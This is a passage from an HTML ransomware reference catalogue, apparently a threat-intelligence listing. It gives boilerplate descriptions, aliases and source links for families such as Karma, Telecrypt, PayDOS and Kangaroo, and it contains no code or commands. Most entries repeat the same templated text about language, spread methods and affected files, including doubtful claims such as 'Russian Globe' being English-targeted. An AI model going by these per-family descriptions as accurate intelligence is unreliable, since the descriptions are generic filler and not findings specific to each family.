<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/crypton">https://decrypter.emsisoft.com/crypton</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/crypton-ransomware-is-here-and-its-not-so-bad-/">https://www.bleepingcomputer.com/news/security/crypton-ransomware-is-here-and-its-not-so-bad-/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/829353444632825856">https://twitter.com/JakubKroustek/status/829353444632825856</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_karma_ransomware"><a class="anchor" href="#_karma_ransomware"></a><a class="link" href="#_karma_ransomware">Karma Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. pretends to be a Windows optimization program called Windows-TuneUp</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1842. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/karma-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/karma-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/researcher-finds-the-karma-ransomware-being-distributed-via-pay-per-install-network/">https://www.bleepingcomputer.com/news/security/researcher-finds-the-karma-ransomware-being-distributed-via-pay-per-install-network/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-18th-2016-crysis-cryptoluck-chip-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-18th-2016-crysis-cryptoluck-chip-and-more/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_wickedlocker_ht_ransomware"><a class="anchor" href="#_wickedlocker_ht_ransomware"></a><a class="link" href="#_wickedlocker_ht_ransomware">WickedLocker HT Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1843. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/wickedlocker-ht-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/wickedlocker-ht-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_pclock3_ransomware"><a class="anchor" href="#_pclock3_ransomware"></a><a class="link" href="#_pclock3_ransomware">PClock3 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. CryptoLocker Copycat</p>
</div>
<div class="paragraph">
<p>PClock3 Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>PClock SuppTeam Ransomware</p>
</li>
<li>
<p>WinPlock</p>
</li>
<li>
<p>CryptoLocker clone</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1844. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/old-cryptolocker-copycat-named-pclock-resurfaces-with-new-attacks/">https://www.bleepingcomputer.com/news/security/old-cryptolocker-copycat-named-pclock-resurfaces-with-new-attacks/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/suppteam-ransomware-sysras.html">https://id-ransomware.blogspot.co.il/2016/11/suppteam-ransomware-sysras.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://researchcenter.paloaltonetworks.com/2015/09/updated-pclock-ransomware-still-comes-up-short/">http://researchcenter.paloaltonetworks.com/2015/09/updated-pclock-ransomware-still-comes-up-short/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://decrypter.emsisoft.com/">https://decrypter.emsisoft.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kolobo_ransomware"><a class="anchor" href="#_kolobo_ransomware"></a><a class="link" href="#_kolobo_ransomware">Kolobo Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Kolobo Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Kolobocheg Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1845. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.ransomware.wiki/tag/kolobo/">https://www.ransomware.wiki/tag/kolobo/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/kolobo-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/kolobo-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://forum.drweb.com/index.php?showtopic=315142">https://forum.drweb.com/index.php?showtopic=315142</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_paysafegen_german_ransomware"><a class="anchor" href="#_paysafegen_german_ransomware"></a><a class="link" href="#_paysafegen_german_ransomware">PaySafeGen (German) Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect German speaking users, since the note is written in German. Mostly affects users in German speaking countries. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>PaySafeGen (German) Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Paysafecard Generator 2016</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1846. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/paysafegen-german-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/paysafegen-german-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/JakubKroustek/status/796083768155078656">https://twitter.com/JakubKroustek/status/796083768155078656</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_telecrypt_ransomware"><a class="anchor" href="#_telecrypt_ransomware"></a><a class="link" href="#_telecrypt_ransomware">Telecrypt Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect Russian speaking users, since the note is written in Russian. Therefore, residents of Russian speaking country are affected. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. The ransomwares authors would request around $75 from their victims to provide them with a decryptor (payments are accepted via Russian payment services Qiwi or Yandex.Money ). Right from the start, however, researchers suggested that TeleCrypt was written by cybercriminals without advanced skills. Telecrypt will generate a random string to encrypt with that is between 10-20 length and only contain the letters vo,pr,bm,xu,zt,dq.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1847. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/telecrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/telecrypt-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.securityweek.com/telecrypt-ransomwares-encryption-cracked">http://www.securityweek.com/telecrypt-ransomwares-encryption-cracked</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://malwarebytes.app.box.com/s/kkxwgzbpwe7oh59xqfwcz97uk0q05kp3">https://malwarebytes.app.box.com/s/kkxwgzbpwe7oh59xqfwcz97uk0q05kp3</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/">https://blog.malwarebytes.com/threat-analysis/2016/11/telecrypt-the-ransomware-abusing-telegram-api-defeated/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/">https://securelist.com/blog/research/76558/the-first-cryptor-to-exploit-telegram/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cerbertear_ransomware"><a class="anchor" href="#_cerbertear_ransomware"></a><a class="link" href="#_cerbertear_ransomware">CerberTear Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1848. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/cerbertear-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/cerbertear-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/">https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/795630452128227333">https://twitter.com/struppigel/status/795630452128227333</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_fucksociety_ransomware"><a class="anchor" href="#_fucksociety_ransomware"></a><a class="link" href="#_fucksociety_ransomware">FuckSociety Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Hidden Tear &gt;&gt; APT Ransomware + HYPERLINK "https://id-ransomware.blogspot.ru/2016/05/remindme-ransomware-2.html" "_blank" RemindMe &gt; FuckSociety</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1849. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/fucksociety-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/fucksociety-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_paydos_ransomware"><a class="anchor" href="#_paydos_ransomware"></a><a class="link" href="#_paydos_ransomware">PayDOS Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. Batch file; Passcode: AES1014DW256 or RSA1014DJW2048</p>
</div>
<div class="paragraph">
<p>PayDOS Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Serpent Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1850. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/paydos-ransomware-serpent.html">https://id-ransomware.blogspot.co.il/2016/11/paydos-ransomware-serpent.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/ransomware-goes-retro-with-paydos-and-serpent-written-as-batch-files/">https://www.bleepingcomputer.com/news/security/ransomware-goes-retro-with-paydos-and-serpent-written-as-batch-files/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.proofpoint.com/us/threat-insight/post/new-serpent-ransomware-targets-danish-speakers">https://www.proofpoint.com/us/threat-insight/post/new-serpent-ransomware-targets-danish-speakers</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zscreenlocker_ransomware"><a class="anchor" href="#_zscreenlocker_ransomware"></a><a class="link" href="#_zscreenlocker_ransomware">zScreenLocker Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1851. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/zscreenlocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/zscreenlocker-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/">https://www.tripwire.com/state-of-security/security-data-protection/cyber-security/november-2016-month-ransomware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/794077145349967872">https://twitter.com/struppigel/status/794077145349967872</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_gremit_ransomware"><a class="anchor" href="#_gremit_ransomware"></a><a class="link" href="#_gremit_ransomware">Gremit Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1852. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/gremit-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/gremit-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/794444032286060544">https://twitter.com/struppigel/status/794444032286060544</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/">https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-november-4th-2016-cerber-paydos-alcatraz-locker-and-more/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hollycrypt_ransomware"><a class="anchor" href="#_hollycrypt_ransomware"></a><a class="link" href="#_hollycrypt_ransomware">Hollycrypt Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1853. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/hollycrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/hollycrypt-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_btclocker_ransomware"><a class="anchor" href="#_btclocker_ransomware"></a><a class="link" href="#_btclocker_ransomware">BTCLocker Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>BTCLocker Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>BTC Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1854. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/btclocker-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/btclocker-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_kangaroo_ransomware"><a class="anchor" href="#_kangaroo_ransomware"></a><a class="link" href="#_kangaroo_ransomware">Kangaroo Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.. From the developer behind the Apocalypse Ransomware, Fabiansomware, and Esmeralda</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1855. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/kangaroo-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/kangaroo-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/">https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_dummyencrypter_ransomware"><a class="anchor" href="#_dummyencrypter_ransomware"></a><a class="link" href="#_dummyencrypter_ransomware">DummyEncrypter Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1856. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/dummyencrypter-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/dummyencrypter-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_encryptss77_ransomware"><a class="anchor" href="#_encryptss77_ransomware"></a><a class="link" href="#_encryptss77_ransomware">Encryptss77 Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>Encryptss77 Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>SFX Monster Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1857. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://virusinfo.info/showthread.php?t=201710">http://virusinfo.info/showthread.php?t=201710</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/encryptss77-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/encryptss77-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_winrarer_ransomware"><a class="anchor" href="#_winrarer_ransomware"></a><a class="link" href="#_winrarer_ransomware">WinRarer Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1858. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/winrarer-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/winrarer-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_russian_globe_ransomware"><a class="anchor" href="#_russian_globe_ransomware"></a><a class="link" href="#_russian_globe_ransomware">Russian Globe Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1859. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/russian-globe-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/russian-globe-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_zerocrypt_ransomware"><a class="anchor" href="#_zerocrypt_ransomware"></a><a class="link" href="#_zerocrypt_ransomware">ZeroCrypt Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1860. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/11/zerocrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/11/zerocrypt-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_rotorcrypt_rotocrypt_tar_ransomware"><a class="anchor" href="#_rotorcrypt_rotocrypt_tar_ransomware"></a><a class="link" href="#_rotorcrypt_rotocrypt_tar_ransomware">RotorCrypt(RotoCrypt, Tar) Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1861. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/rotorcrypt-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/rotorcrypt-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ishtar_ransomware"><a class="anchor" href="#_ishtar_ransomware"></a><a class="link" href="#_ishtar_ransomware">Ishtar Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1862. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/ishtar-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/ishtar-ransomware.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_masterbuster_ransomware"><a class="anchor" href="#_masterbuster_ransomware"></a><a class="link" href="#_masterbuster_ransomware">MasterBuster Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1863. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://id-ransomware.blogspot.co.il/2016/10/masterbuster-ransomware.html">https://id-ransomware.blogspot.co.il/2016/10/masterbuster-ransomware.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://twitter.com/struppigel/status/791943837874651136">https://twitter.com/struppigel/status/791943837874651136</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_jackpot_ransomware"><a class="anchor" href="#_jackpot_ransomware"></a><a class="link" href="#_jackpot_ransomware">JackPot Ransomware</a></h3>
<div class="paragraph">
<p>This is most likely to affect English speaking users, since the note is written in English. English is understood worldwide, thus anyone can be harmed. The hacker spread the virus using email spam, fake updates, and harmful attachments. All your files are compromised including music, MS Office, Open Office, pictures, videos, shared online files etc..</p>
</div>
<div class="paragraph">
<p>JackPot Ransomware is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Jack.Pot Ransomware</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 1864. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
